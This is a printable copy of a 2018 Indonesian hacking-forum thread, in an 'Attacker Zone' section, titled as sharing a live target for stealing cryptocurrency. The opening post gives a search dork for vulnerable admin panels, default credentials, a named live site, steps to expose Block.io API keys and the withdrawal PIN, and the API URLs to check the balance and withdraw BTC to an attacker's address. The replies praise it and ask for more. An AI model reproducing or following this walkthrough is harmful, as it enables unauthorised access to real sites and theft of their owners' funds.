Indonesian Back|Track Team
Share Live Target Stealing Cryptocurrency (Ex: BTC) - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html)
+--- Thread: Share Live Target Stealing Cryptocurrency (Ex: BTC) (/thread-7098.html)



Live Target Stealing Cryptocurrency (Ex: BTC) - cyberking - 03-05-2018

Hayo, yang panas panasan dengan cryptocurrency.
kali ini kita berbagi tentang kesalahan admin yang suka bikin password gampangan kaya cabecabean, eh. Tongue
Langsung aja, sruputtt Big Grin

Dork :
intext:"Edit from WebAdmin."

Login Admin : http://<site.com>/admin

Default login :
user : admin
pass : admin

OR

user : admin
pass : 123456

LIVE DEMO?

https://kacip[.]my/admin/
user : admin
pass : admin

Go to -> https://kacip[.]my/admin/?a=api_keys

[Image: L1xOiVv.png]

Nah, dari sana muncul API Key Block[.]io
Sekarang nyoba edit Api nya biar keliatan PIN SECRET buat withdraw

Go to -> https://kacip[dot]my/admin/?a=api_keys&b=edit&id=1

[Image: l90gFEh.png]

Wakaka, sekarang kita liat dulu saldo BTC di block[dot]io dengan API KEY itu
How to?
https://block[dot]io/api/v2/get_balance/?api_key=<API KEY nya>
ex:
https://block[dot]io/api/v2/get_balance/?api_key=2e7d-01d0-3a29-92a4

[Image: HaMBuWG.png]


dengan balance segitu ga cukup buat Withdraw Sick Sick Sick 
Tapi kalo om om semua mau ngoprek lg nemu yang ada balancenya, cara withdrawnya begini

https://block[dot]io/api/v2/withdraw/?api_key=<API KEY nya>&amounts=<NILAI nya>&to_addresses=<ALAMAT BTC nya>&pin=<SECRET PIN nya>

tapi karna ga berhasil akibat kekurangan balance jadinya begini Sick Sick Sick

[Image: 9TBAfhS.png]


KEEP LEARN AND SHARE! Sick


RE: Live Target Stealing Cryptocurrency (Ex: BTC) - Admirer - 03-08-2018

mantep om.... opit nih.. :v


RE: Live Target Stealing Cryptocurrency (Ex: BTC) - cyberking - 03-08-2018

coba share balik yang uda dikembangkan lagi, kali aja nemu api lain selain block dot io
biar oprek bareng